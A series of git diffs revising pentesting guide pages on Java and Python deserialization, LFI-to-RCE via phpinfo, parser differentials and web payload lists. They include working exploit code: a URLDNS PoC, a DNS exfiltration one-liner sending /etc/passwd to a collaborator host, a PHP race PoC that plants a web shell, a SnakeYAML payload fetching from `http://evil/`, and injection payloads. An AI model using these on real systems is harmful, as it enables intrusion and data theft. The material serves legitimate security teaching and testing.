-As you can see, when a `URLObject` executes`.hashCode()` it is called `hashCode(this)`. A continuation you can see the code of this function:
+When the cached value is `-1`, the method delegates to the URL stream handler. The handler's calculation includes the host address:
 
 ```java
  protected int hashCode(URL u) {
@@ -63,13 +62,13 @@ As you can see, when a `URLObject` executes`.hashCode()` it is called `hashCode(
         [   ...   ]
 ```
 
-You can see that a `getHostAddress` is executed to the domain, **launching a DNS query**.
+Resolving that address can emit the DNS query used as the out-of-band signal.
 
-Therefore, this class can be **abused** in order to **launch** a **DNS query** to **demonstrate** that **deserialization** is possible, or even to **exfiltrate information** (you can append as subdomain the output of a command execution).<sup>[[1]](#references)</sup>
+This dependency-free chain is commonly called **URLDNS**. A callback demonstrates that the target processed the serialization stream far enough to hash the key; it does **not** by itself provide command execution. If a separate gadget has already achieved command execution, its output can be encoded into DNS labels for exfiltration.<sup>[[1]](#references)[[7]](#references)</sup>
 
 ### URLDNS payload code example
 
-You can find the [URDNS payload code from ysoserial here](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). However, just for make it easier to understand how to code it I created my own PoC (based on the one from ysoserial):
+The canonical [ysoserial URLDNS implementation](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java) uses a temporary silent handler to avoid resolving the name while constructing the payload. Because `URL.handler` is transient, the receiving JVM reconstructs the normal handler; resetting the cached hash to `-1` makes the receiver calculate it again. The following standalone PoC preserves that behavior:<sup>[[7]](#references)</sup>
 
 ```java
 import java.io.File;
@@ -105,7 +104,7 @@ public class URLDNS {
 
 	public static void main(final String[] args) throws Exception {
 		String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
-		HashMap ht = new HashMap(); // HashMap that will contain the URL
+		HashMap<URL, String> ht = new HashMap<>(); // HashMap that will contain the URL
 		URLStreamHandler handler = new SilentURLStreamHandler();
     URL u = new URL(null, url, handler); // URL to use as the Key
     ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
@@ -134,30 +133,29 @@ class SilentURLStreamHandler extends URLStreamHandler {
 }
 ```
 
-In the original idea thee commons collections payload was changed to perform a DNS query, this was less reliable that the proposed method.<sup>[[2]](#references)</sup>
+On Java 9 and later, reflective access to the private `java.net.URL.hashCode` field may require launching the generator with `--add-opens java.base/java.net=ALL-UNNAMED`. The serialized payload itself remains dependency-free. Earlier detection approaches modified a Commons Collections chain to perform a DNS query; URLDNS avoids that external library dependency.<sup>[[2]](#references)[[7]](#references)</sup>
 
 ## GadgetProbe
 
 You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) from the Burp Suite App Store (Extender).
 
-**GadgetProbe** will try to figure out if some **Java classes exist** on the Java class of the server so you can know **if** it's **vulnerable** to some known exploit.<sup>[[3]](#references)</sup>
+**GadgetProbe** tests whether candidate Java classes appear to be present on the target's classpath. Class presence helps select chains for further validation, but does not by itself prove that a particular gadget chain is exploitable.<sup>[[3]](#references)</sup>
 
 ### How does it work
 
-**GadgetProbe** will use the same **DNS payload of the previous section** but **before** running the DNS query it will **try to deserialize an arbitrary class**. If the **arbitrary class exists**, the **DNS query** will be **sent** and GadgProbe will note that this class exist. If the **DNS** request is **never sent**, this means that the **arbitrary class wasn't deserialized** successfully so either it's not present or it''s **not serializable/exploitable**.
+**GadgetProbe** combines the DNS signal from the previous section with a probe for an arbitrary class. A callback is evidence that the target resolved the tested class before reaching the URLDNS key. No callback is ambiguous: the class may be absent, but DNS egress controls, caching, serialization filters, incompatible class metadata, or application behavior can also suppress the signal. Confirm findings with more than one controlled probe.
 
-Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) with Java classes for being tested.
+The repository includes [wordlists](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) of Java classes to test.
 
 ![https://github.com/BishopFox/GadgetProbe/blob/master/assets/intruder4.gif](<../../images/intruder4 (1) (1).gif>)
 
 ## Java Deserialization Scanner
 
-This scanner can be **download** from the Burp App Store (**Extender**).\
-The **extension** has **passive** and active **capabilities**.<sup>[[4]](#references)</sup>
+This scanner can be downloaded from the Burp App Store (**Extender**). The extension has both passive and active capabilities.<sup>[[4]](#references)</sup>
 
 ### Passive
 
-By default it **checks passively** all the requests and responses sent **looking** for **Java serialized magic bytes** and will present a vulnerability warning if any is found:
+By default, it passively checks requests and responses for Java serialization magic bytes and reports the observation. Finding the marker identifies a serialization data path; exploitability still requires validation:
 
 ![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../images/image (765).png>)<sup>[[4]](#references)</sup>
 
@@ -170,31 +168,37 @@ Then, inside the _Deserialization Scanner Tab_ --> _Manual testing tab_ you can 
 
 ![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../images/3-1.png)<sup>[[4]](#references)</sup>
 
-Even if this is called "Manual testing", it's pretty **automated**. It will automatically check if the **deserialization** is **vulnerable** to **any ysoserial payload** checking the libraries present on the web server and will highlight the ones vulnerable. In order to **check** for **vulnerable libraries** you can select to launch **Javas Sleeps**, **sleeps** via **CPU** consumption, or using **DNS** as it has previously being mentioned.
+Although the feature is called "Manual testing", it automates multiple active checks using ysoserial payloads and highlights observed timing or DNS signals. Available checks include Java sleep calls, CPU-consumption delays, and DNS callbacks. These probes deserialize attacker-controlled object graphs and may trigger gadget side effects, so use them only against systems you are authorized to test.
 
 **Exploiting**
 
 Once you have identified a vulnerable library you can send the request to the _Exploiting Tab_.\
-I this tab you have to **select** the **injection point** again, an **write** the **vulnerable library** you want to create a payload for, and the **command**. Then, just press the appropriate **Attack** button.
+In this tab, select the injection point again, specify the candidate gadget chain and command, and press the appropriate **Attack** button.
 
 ![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../images/4.png)<sup>[[4]](#references)</sup>
 
-### Java Deserialization DNS Exfil information
+### Java deserialization DNS exfiltration
 
-Make your payload execute something like the following:
+After a separate gadget chain has achieved command execution, a payload can exfiltrate data through DNS labels. The following example archives `/etc/passwd`, hex-encodes the stream into 31-byte chunks, and resolves each numbered chunk:
 
 ```bash
 (i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
 ```
 
+## Defensive guidance
+
+Do not deserialize untrusted native Java serialization streams. Where legacy compatibility makes that impossible, apply a narrow `ObjectInputFilter` allowlist and graph-size limits, and remember that class filters reduce exposure rather than making unsafe object graphs intrinsically safe. JEP 290 introduced JVM-wide and per-stream filtering in Java 9, while JEP 415 added context-specific filter factories in Java 17.<sup>[[6]](#references)[[8]](#references)</sup>
+
 ## References
 
 - [1] [Triggering a DNS lookup using Java deserialization](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
 - [2] [Detecting deserialization bugs with DNS exfiltration](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
-- [3] [GadgetProbe (Bishop Fox research)](https://know.bishopfox.com/research/gadgetprobe)
+- [3] [Bishop Fox GadgetProbe source and usage documentation](https://github.com/BishopFox/GadgetProbe)
 - [4] [Reliable discovery and exploitation of Java deserialization vulnerabilities](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)
+- [5] [Java Platform API — `java.net.URL`](https://docs.oracle.com/en/java/javase/21/docs/api/java.base/java/net/URL.html)
+- [6] [JEP 290: Filter Incoming Serialization Data](https://openjdk.org/jeps/290)
+- [7] [ysoserial URLDNS payload source](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java)
+- [8] [JEP 415: Context-Specific Deserialization Filters](https://openjdk.org/jeps/415)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-web/deserialization/python-yaml-deserialization.md
+++ b/src/pentesting-web/deserialization/python-yaml-deserialization.md
@@ -1,14 +1,14 @@
-# Python Yaml Deserialization
+# Python YAML Deserialization
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Yaml **Deserialization**
+## YAML Deserialization
 
 Python **YAML** libraries can **serialize Python objects**, not just raw data structures. That is the dangerous part: when the loader is allowed to resolve Python-specific tags, parsing attacker-controlled YAML becomes very close to calling `pickle.load()`.
 
 For generic parser-confusion bugs and non-Python YAML issues, also check [JSON, XML & Yaml Hacking](../json-xml-yaml-hacking.md).
 
-```python
+```text
 print(yaml.dump(str("lol")))
 lol
 ...
@@ -50,7 +50,7 @@ print(yaml.full_load(data))    # ConstructorError in modern PyYAML
 print(yaml.unsafe_load(data))  # range(1, 10)
 ```
 
-In current PyYAML, **`unsafe_load()`** is still the intended way to reconstruct Python-specific tags. `safe_load()` rejects them, and `full_load()` only became reliably non-exploitable for this class of payloads after the **5.4** fixes.<sup>[[4]](#references)</sup>
+In current PyYAML, **`unsafe_load()`** is the intended API for reconstructing arbitrary Python-specific tags. `safe_load()` rejects them, and PyYAML **5.4** moved the remaining arbitrary Python tags out of `FullLoader`, closing the known `python/object/new` bypass represented below.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ### Basic Exploit
 
@@ -146,7 +146,7 @@ That is no longer a generic PyYAML bug; it is now an **application gadget**. Fro
 rg -n "yaml\.(load|full_load|unsafe_load)|Loader=yaml\.(Loader|UnsafeLoader|FullLoader)|add_(multi_)?constructor|yaml_loader\s*=\s*yaml\.SafeLoader|YAML\(typ=['\"]unsafe['\"]\)" .
 ```
 
-Also review wrappers and helper functions. A lot of 2025-2026 advisories were just one layer above PyYAML: a project exposed a YAML import/config feature, internally called `yaml.FullLoader`, and became exploitable again on older PyYAML releases.
+Also review wrappers and helper functions: a project may expose a YAML import or configuration feature that ultimately selects an unsafe loader, or it may remain exploitable because an appliance or vendored environment pins an old PyYAML release.
 
 ## RCE
 
@@ -171,7 +171,7 @@ print(yaml.unsafe_load(deserialized_data))
 
 ### `ruamel.yaml`
 
-The same review mindset applies to **`ruamel.yaml`**. If you find `YAML(typ='unsafe')`, treat it as the equivalent of an unsafe PyYAML loader. Newer `ruamel.yaml` documentation has been steering users away from `typ='unsafe'` and towards `typ='full'` for **dumping only**, with explicit class registration required to get the old unsafe loading behaviour back.
+The same review mindset applies to **`ruamel.yaml`**. If you find `YAML(typ='unsafe')`, treat it as the equivalent of an unsafe PyYAML loader. Current `ruamel.yaml` documentation deprecates `typ='unsafe'` and recommends `typ='full'` for dumping registered Python classes; loading should use the safe default unless the application deliberately registers constructors.<sup>[[6]](#references)</sup>
 
 ### Tool to create Payloads
 
@@ -205,5 +205,7 @@ cat /tmp/example_yaml
 - [2] [YAML Deserialization Attack in Python (Net-Square)](https://net-square.com/yaml-deserialization-attack-in-python.html)
 - [3] [Showcasing the Importance of Secure Defaults with a PyYAML 0day](https://blog.ankursundara.com/pyyaml-cve/)
 - [4] [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation)
+- [5] [PyYAML 5.4.1 changelog - fix for CVE-2020-14343](https://github.com/yaml/pyyaml/blob/5.4.1/CHANGES)
+- [6] [ruamel.yaml project documentation](https://yaml.dev/doc/ruamel.yaml/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
@@ -2,10 +2,11 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-To exploit this technique you need all of the following:
+To exploit this technique, you need all of the following:
+
 - A reachable page that prints phpinfo() output.
 - A Local File Inclusion (LFI) primitive you control (e.g., include/require on user input).
-- PHP file uploads enabled (file_uploads = On). Any PHP script will accept RFC1867 multipart uploads and create a temporary file for each uploaded part.
+- PHP file uploads enabled (`file_uploads = On`). When the web server routes a valid multipart POST to PHP, PHP's RFC 1867 processing creates a temporary file for each accepted upload part before the script runs.<sup>[[2]](#references)</sup>
 - The PHP worker must be able to write to the configured upload_tmp_dir (or default system temp directory) and your LFI must be able to include that path.
 
 Classic write-up and original PoC:
@@ -75,7 +76,7 @@ If the page does not show `$_FILES`, make sure you are really sending a `multipa
 > Tips
 > - Use multiple concurrent workers to increase your chances of winning the race.
 > - Padding placement that commonly helps: URL parameter, Cookie, User-Agent, Accept-Language, Pragma. Tune per target.
-> - If the vulnerable sink appends an extension (e.g., .php), you don’t need a null byte; include() will execute PHP regardless of the temp file extension.
+> - The temporary file does not need a `.php` extension because `include()` parses the included file as PHP. However, if the vulnerable sink **appends** `.php`, the exact temporary path no longer exists; you need a separate suffix-bypass primitive. Modern PHP does not accept `%00` as a generic path terminator.
 
 ## Minimal Python 3 PoC (socket-based)
 
@@ -83,7 +84,11 @@ The snippet below focuses on the critical parts and is easier to adapt than the 
 
 ```python
 #!/usr/bin/env python3
-import re, html, socket, threading
+import html
+import re
+import socket
+import threading
+from urllib.parse import quote
 
 HOST = 'target.local'
 PORT = 80
@@ -92,13 +97,14 @@ LFIPATH = '/vuln.php?file=%s'  # sprintf-style where %s will be the tmp path
 THREADS = 10
 
 PAYLOAD = (
-    "<?php file_put_contents('/tmp/.p.php', '<?php system($_GET[\\"x\\"]); ?>'); ?>\r\n"
+    "<?php echo 'HT_RACE_OK'; "
+    "file_put_contents('/tmp/.p.php', '<?php system($_GET[\"x\"]); ?>'); ?>\r\n"
 )
 BOUND = '---------------------------7dbff1ded0714'
 PADDING = 'A' * 6000
-REQ1_DATA = (f"{BOUND}\r\n"
+REQ1_DATA = (f"--{BOUND}\r\n"
              f"Content-Disposition: form-data; name=\"f\"; filename=\"a.txt\"\r\n"
-             f"Content-Type: text/plain\r\n\r\n{PAYLOAD}{BOUND}--\r\n")
+             f"Content-Type: text/plain\r\n\r\n{PAYLOAD}\r\n--{BOUND}--\r\n")
 
 REQ1 = (f"POST {PHPSCRIPT}?a={PADDING} HTTP/1.1\r\n"
         f"Host: {HOST}\r\nCookie: sid={PADDING}; o={PADDING}\r\n"
@@ -106,46 +112,61 @@ REQ1 = (f"POST {PHPSCRIPT}?a={PADDING} HTTP/1.1\r\n"
         f"Content-Type: multipart/form-data; boundary={BOUND}\r\n"
         f"Content-Length: {len(REQ1_DATA)}\r\n\r\n{REQ1_DATA}")
 
-LFI = ("GET " + LFIPATH + " HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n")
-
-pat = re.compile(r"\\[tmp_name\\]\\s*=&gt;\\s*([^\\s<]+)")
+pat = re.compile(r"\\[tmp_name\\]\\s*=>\\s*([^\\s<]+)")
 
 
 def race_once():
     s1 = socket.socket()
     s2 = socket.socket()
-    s1.connect((HOST, PORT))
-    s2.connect((HOST, PORT))
-    s1.sendall(REQ1.encode())
-    buf = b''
-    tmp = None
-    while True:
-        chunk = s1.recv(4096)
-        if not chunk:
-            break
-        buf += chunk
-        m = pat.search(html.unescape(buf.decode(errors='ignore')))
-        if m:
-            tmp = m.group(1)
-            break
-    ok = False
-    if tmp:
-        req = (LFI % tmp).encode() % HOST.encode()
-        s2.sendall(req)
-        r = s2.recv(4096)
-        ok = b'.p.php' in r or b'HTTP/1.1 200' in r
-    s1.close(); s2.close()
-    return ok
+    s1.settimeout(5)
+    s2.settimeout(5)
+    try:
+        s1.connect((HOST, PORT))
+        s2.connect((HOST, PORT))
+        s1.sendall(REQ1.encode())
+        buf = b''
+        tmp = None
+        while len(buf) < 2_000_000:
+            chunk = s1.recv(4096)
+            if not chunk:
+                break
+            buf += chunk
+            decoded = html.unescape(buf.decode(errors='ignore'))
+            m = pat.search(decoded)
+            if m:
+                tmp = m.group(1)
+                break
+        if not tmp:
+            return False
+
+        lfi_path = LFIPATH % quote(tmp, safe='/')
+        req = (f"GET {lfi_path} HTTP/1.1\r\nHost: {HOST}\r\n"
+               "Connection: close\r\n\r\n")
+        s2.sendall(req.encode())
+        response = b''
+        while b'HT_RACE_OK' not in response and len(response) < 1_000_000:
+            chunk = s2.recv(4096)
+            if not chunk:
+                break
+            response += chunk
+        return b'HT_RACE_OK' in response
+    except (OSError, socket.timeout):
+        return False
+    finally:
+        s1.close()
+        s2.close()
 
 if __name__ == '__main__':
-    hit = False
+    hit = threading.Event()
+
     def worker():
-        nonlocal_hit = False
-        while not hit and not nonlocal_hit:
-            nonlocal_hit = race_once()
-        if nonlocal_hit:
+        while not hit.is_set():
+            if not race_once():
+                continue
             print('[+] Won the race, payload dropped as /tmp/.p.php')
-            exit(0)
+            hit.set()
+            return
+
     ts = [threading.Thread(target=worker) for _ in range(THREADS)]
     [t.start() for t in ts]
     [t.join() for t in ts]

--- a/src/pentesting-web/json-xml-yaml-hacking.md
+++ b/src/pentesting-web/json-xml-yaml-hacking.md
@@ -78,10 +78,13 @@ json.Unmarshal([]byte(`{"AcTiOn":"AdminAction"}`), &req)
 // matches `Action` field
 ```
 
-Unicode simple-fold equivalents can also match. For example, the long-s character can collide with an ASCII `s` in a field name:<sup>[[1]](#references)</sup>
+Unicode simple-fold equivalents can also match. For example, the long-s character can collide with ASCII `s`, and the Kelvin sign can collide with ASCII `K` in field names:<sup>[[1]](#references)</sup>
 ```go
 json.Unmarshal([]byte(`{"Uſername":"admin"}`), &user)
 // may match the exported field Username
+
+json.Unmarshal([]byte(`{"Key":"value"}`), &record)
+// may match the exported field Key
 ```
 
 **3. Cross-service mismatch:**

--- a/src/pentesting-web/json-xml-yaml-hacking.md
+++ b/src/pentesting-web/json-xml-yaml-hacking.md
@@ -1,17 +1,17 @@
-# JSON, XML & Yaml Hacking & Issues
+# JSON, XML, and YAML Hacking and Issues
 
 {{#include ../banners/hacktricks-training.md}}
 
 ## Go JSON Decoder
 
-The following issues were detected in the Go JSON although they could be present in other languages as well. These issues were published in [**this blog post**](https://blog.trailofbits.com/2025/06/17/unexpected-security-footguns-in-gos-parsers/).<sup>[[1]](#references)</sup>
+The following Go parser behaviors can create security problems when different components interpret the same input differently. They were analyzed in [this Trail of Bits post](https://blog.trailofbits.com/2025/06/17/unexpected-security-footguns-in-gos-parsers/), and the Go documentation explicitly records several `encoding/json` interoperability behaviors.<sup>[[1]](#references)[[4]](#references)</sup>
 
-Go’s JSON, XML, and YAML parsers have a long trail of inconsistencies and insecure defaults that can be abused to **bypass authentication**, **escalate privileges**, or **exfiltrate sensitive data**.
+Parser differentials and permissive application-level validation can be abused to **bypass authorization**, **escalate privileges**, or **exfiltrate sensitive data**. The risky behavior is often the composition of parsers and trust decisions, rather than memory-unsafe parsing by itself.<sup>[[1]](#references)</sup>
 
 
 ### (Un)Marshaling Unexpected Data
 
-The goal is to exploit structs that allow an attacker to read/write sensitive fields (e.g., `IsAdmin`, `Password`).
+The goal is to find exported struct fields that an application did not intend an attacker to set, such as `IsAdmin` or `Password`.<sup>[[1]](#references)[[4]](#references)</sup>
 
 - Example Struct:
 ```go
@@ -58,21 +58,18 @@ type User struct {
 
 ### Parser Differentials
 
-The goal is to bypass authorization by exploiting how different parsers interpret the same payload differently like in:
-- CVE-2017-12635: Apache CouchDB bypass via duplicate keys
-- 2022: Zoom 0-click RCE via XML parser inconsistency
-- GitLab 2025 SAML bypass via XML quirks
+The goal is to bypass authorization by exploiting how different parsers interpret the same payload. Real cases include CouchDB's duplicate-key administrator bypass, a Zoom XMPP/XML parser differential, and GitLab's 2025 SAML parser-confusion bypass.<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup>
 
 
 **1. Duplicate Fields:**
-Go's `encoding/json` takes the **last** field.
+Go's `encoding/json` processes duplicate members in order; later scalar values replace earlier ones, while maps and structs can merge values.<sup>[[4]](#references)</sup>
 
 ```go
 json.Unmarshal([]byte(`{"action":"UserAction", "action":"AdminAction"}`), &req)
 fmt.Println(req.Action) // AdminAction
 ```
 
-Other parsers (e.g., Java’s Jackson) may take the **first**.
+Other parsers or configurations may reject duplicates, preserve the first value, or also preserve the last value. This becomes exploitable when security checks and business logic disagree about the same object.<sup>[[1]](#references)[[4]](#references)</sup>
 
 **2. Case Insensitivity:**
 Go is case-insensitive:
@@ -81,9 +78,10 @@ json.Unmarshal([]byte(`{"AcTiOn":"AdminAction"}`), &req)
 // matches `Action` field
 ```
 
-Even Unicode tricks work:
+Unicode simple-fold equivalents can also match. For example, the long-s character can collide with an ASCII `s` in a field name:<sup>[[1]](#references)</sup>
 ```go
-json.Unmarshal([]byte(`{"aKtionſ": "bypass"}`), &req)
+json.Unmarshal([]byte(`{"Uſername":"admin"}`), &user)
+// may match the exported field Username
 ```
 
 **3. Cross-service mismatch:**
@@ -105,8 +103,7 @@ Attacker sends:
 
 ### Data Format Confusion (Polyglots)
 
-The goal is to exploit systems that mix formats (JSON/XML/YAML) or fail open on parser errors like:
-- **CVE-2020-16250**: HashiCorp Vault parsed JSON with an XML parser after STS returned JSON instead of XML.
+The goal is to exploit systems that mix formats (JSON/XML/YAML) or fail open on parser errors. In **CVE-2020-16250**, Vault's AWS authentication trusted identity data obtained through a content-type/parser confusion involving AWS STS responses.<sup>[[8]](#references)</sup>
 
 Attacker controls:
 - The `Accept: application/json` header
@@ -137,8 +134,8 @@ Result:
 ### SnakeYAML Deserialization RCE (CVE-2022-1471)
 
 * Affects: `org.yaml:snakeyaml` < **2.0** (used by Spring-Boot, Jenkins, etc.).<sup>[[2]](#references)</sup>
-* Root cause: `new Constructor()` deserializes **arbitrary Java classes**, allowing gadget chains that culminate in remote-code execution.
-* One-liner PoC (will open the calculator on vulnerable host):
+* Root cause: unsafe construction can instantiate **arbitrary Java classes**, allowing a suitable classpath or remotely supplied service-provider gadget to culminate in code execution.
+* Example global-tag payload (the remote URL must provide a compatible `ScriptEngine` provider for code execution):
 ```yaml
 !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://evil/"] ] ] ]
 ```
@@ -155,7 +152,7 @@ Result:
 ### RapidJSON Integer (Under|Over)-flow (CVE-2024-38517 / CVE-2024-39684)
 
 * Affects: Tencent **RapidJSON** before commit `8269bc2` (<1.1.0-patch-22).
-* Bug: In `GenericReader::ParseNumber()` unchecked arithmetic lets attackers craft huge numeric literals that wrap around and corrupt the heap — ultimately enabling privilege-escalation when the resulting object graph is used for authorization decisions. 
+* Bug: integer underflow/overflow in `GenericReader::ParseNumber()` can be triggered by crafted numeric input. The published records describe elevation-of-privilege impact in an application that opens a crafted file; do not generalize that impact to every program using RapidJSON.<sup>[[9]](#references)[[10]](#references)</sup>
 
 ---
 
@@ -164,9 +161,9 @@ Result:
 | Risk                                | Fix / Recommendation                                      |
 |-------------------------------------|------------------------------------------------------------|
 | Unknown fields (JSON)               | `decoder.DisallowUnknownFields()`                          |
-| Duplicate fields (JSON)             | ❌ No fix in stdlib — validate with [`jsoncheck`](https://github.com/dvsekhvalnov/johnny-five) |
-| Case-insensitive match (Go)         | ❌ No fix — validate struct tags + pre-canonicalize input   |
-| XML garbage data / XXE              | Use a hardened parser (`encoding/xml` + `DisallowDTD`)     |
+| Duplicate fields (JSON)             | Pre-scan/reject duplicates or use a strict JSON implementation; `DisallowUnknownFields` does not reject duplicates |
+| Case-insensitive match (Go)         | Validate keys before unmarshaling, or use a case-sensitive strict decoder where protocol compatibility allows it |
+| XML shape / format confusion        | Keep `encoding/xml.Decoder.Strict` enabled, reject unexpected directives/tokens, validate the root/schema, and enforce the expected content type |
 | YAML unknown keys                   | `yaml.KnownFields(true)`                                   |
 | **Unsafe YAML deserialization**     | Use SafeConstructor / upgrade to SnakeYAML ≥2.0            |
 | libyaml ≤0.2.5 double-free          | Upgrade to **0.2.6** or distro-patched release            |
@@ -183,5 +180,12 @@ mass-assignment-cwe-915.md
 - [1] [Trail of Bits – Unexpected security footguns in Go's parsers](https://blog.trailofbits.com/2025/06/17/unexpected-security-footguns-in-gos-parsers/)
 - [2] [Baeldung – Resolving CVE-2022-1471 With SnakeYAML 2.0](https://www.baeldung.com/spring-boot-snakeyaml-2-0-cve-2022-1471-issue)
 - [3] [Ubuntu Security Tracker – CVE-2024-35325 (libyaml)](https://ubuntu.com/security/CVE-2024-35325)
+- [4] [Go documentation - `encoding/json` security considerations](https://pkg.go.dev/encoding/json#hdr-Security_Considerations)
+- [5] [Apache CouchDB security advisory - CVE-2017-12635](https://docs.couchdb.org/en/stable/cve/2017-12635.html)
+- [6] [Google Project Zero - Zooming in on Zero-click Exploits](https://googleprojectzero.blogspot.com/2022/01/zooming-in-on-zero-click-exploits.html)
+- [7] [GitLab security release - SAML authentication bypass](https://about.gitlab.com/releases/2025/05/14/patch-release-gitlab-18-0-1-17-11-3-17-10-7/)
+- [8] [HashiCorp security advisory - CVE-2020-16250](https://discuss.hashicorp.com/t/hcsec-2020-18-vault-s-aws-authentication-method-is-vulnerable-to-authentication-bypass/13981)
+- [9] [CVE record - CVE-2024-38517](https://www.cve.org/CVERecord?id=CVE-2024-38517)
+- [10] [CVE record - CVE-2024-39684](https://www.cve.org/CVERecord?id=CVE-2024-39684)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
+++ b/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
@@ -6,7 +6,7 @@ Quick list of **shotgun payloads** and **differential probes** to throw at refle
 
 ## Quick shotgun payloads
 
-```python
+```text
 {{7*7}}[7*7]
 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
@@ -14,17 +14,17 @@ Quick list of **shotgun payloads** and **differential probes** to throw at refle
 %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
 %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
 %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
-<br><b><h1>THIS IS AND INJECTED TITLE </h1>
+<br><b><h1>THIS IS AN INJECTED TITLE</h1>
 /etc/passwd
 ../../../../../../etc/hosts
 ..\..\..\..\..\..\etc/hosts
 /etc/hostname
-../../../../../../etc/hosts
+/proc/self/environ
 C:/windows/system32/drivers/etc/hosts
 ../../../../../../windows/system32/drivers/etc/hosts
 ..\..\..\..\..\..\windows/system32/drivers/etc/hosts
-http://asdasdasdasd.burpcollab.com/mal.php
-\\asdasdasdasd.burpcollab.com/mal.php
+http://<collaborator>/mal.php
+\\<collaborator>\mal.php
 www.whitelisted.com
 www.whitelisted.com.evil.com
 https://google.com
@@ -140,7 +140,7 @@ Use these when user-controlled route params, uploaded metadata, or stored JSON b
 <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><image href='1' onerror='alert(1)' /></svg>#x" />
 ```
 
-This is handy when classic `img/onerror` payloads fail but SVG elements or `data:` URLs survive filtering.
+This browser-dependent probe is handy when classic `img/onerror` payloads fail but SVG elements or `data:` URLs survive filtering. Run it in an isolated test profile and confirm support in the target browser before treating a filtered reflection as exploitable.<sup>[[5]](#references)</sup>
 
 ## References
 
@@ -148,5 +148,6 @@ This is handy when classic `img/onerror` payloads fail but SVG elements or `data
 - [2] [HTTP/1 must die - PortSwigger Research](https://portswigger.net/research/http1-must-die)
 - [3] [Introducing the URL Validation Bypass Cheat Sheet - PortSwigger Research](https://portswigger.net/research/introducing-the-url-validation-bypass-cheat-sheet)
 - [4] [CSPT via file upload - Doyensec](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
+- [5] [PortSwigger - Cross-site scripting cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/rate-limit-bypass.md
+++ b/src/pentesting-web/rate-limit-bypass.md
@@ -6,15 +6,15 @@
 
 ### Exploring Similar Endpoints
 
-Attempts should be made to perform brute force attacks on variations of the targeted endpoint, such as `/api/v3/sign-up`, including alternatives like `/Sing-up`, `/SignUp`, `/singup`, `/api/v1/sign-up`, `/api/sign-up` etc.
+During an authorized test, compare variations of the protected endpoint, such as `/api/v3/sign-up`, `/Sign-up`, `/SignUp`, `/signup`, `/api/v1/sign-up`, and `/api/sign-up`. A bypass here normally indicates that canonicalization or routing happens after the rate-limit decision.
 
 ### Incorporating Blank Characters in Code or Parameters
 
-Inserting blank bytes like `%00`, `%0d%0a`, `%0d`, `%0a`, `%09`, `%0C`, `%20` into code or parameters can be a useful strategy. For example, adjusting a parameter to `code=1234%0a` allows for extending attempts through variations in input, like adding newline characters to an email address to get around attempt limitations.
+Test whether the limiter and application normalize delimiters differently. Candidates include a NUL (`%00`), CRLF (`%0d%0a`), CR (`%0d`), LF (`%0a`), horizontal tab (`%09`), form feed (`%0c`), and space (`%20`). For example, `code=1234%0a` may produce a different limiter key even if the application later trims the newline. `%0d%0a` is a two-character line break, not a blank byte; malformed control characters can also be rejected by proxies before reaching the application.
 
 ### Manipulating IP Origin via Headers
 
-Modifying headers to alter the perceived IP origin can help evade IP-based rate limiting. Headers such as `X-Originating-IP`, `X-Forwarded-For`, `X-Remote-IP`, `X-Remote-Addr`, `X-Client-IP`, `X-Host`, `X-Forwared-Host`, including using multiple instances of `X-Forwarded-For`, can be adjusted to simulate requests from different IPs.
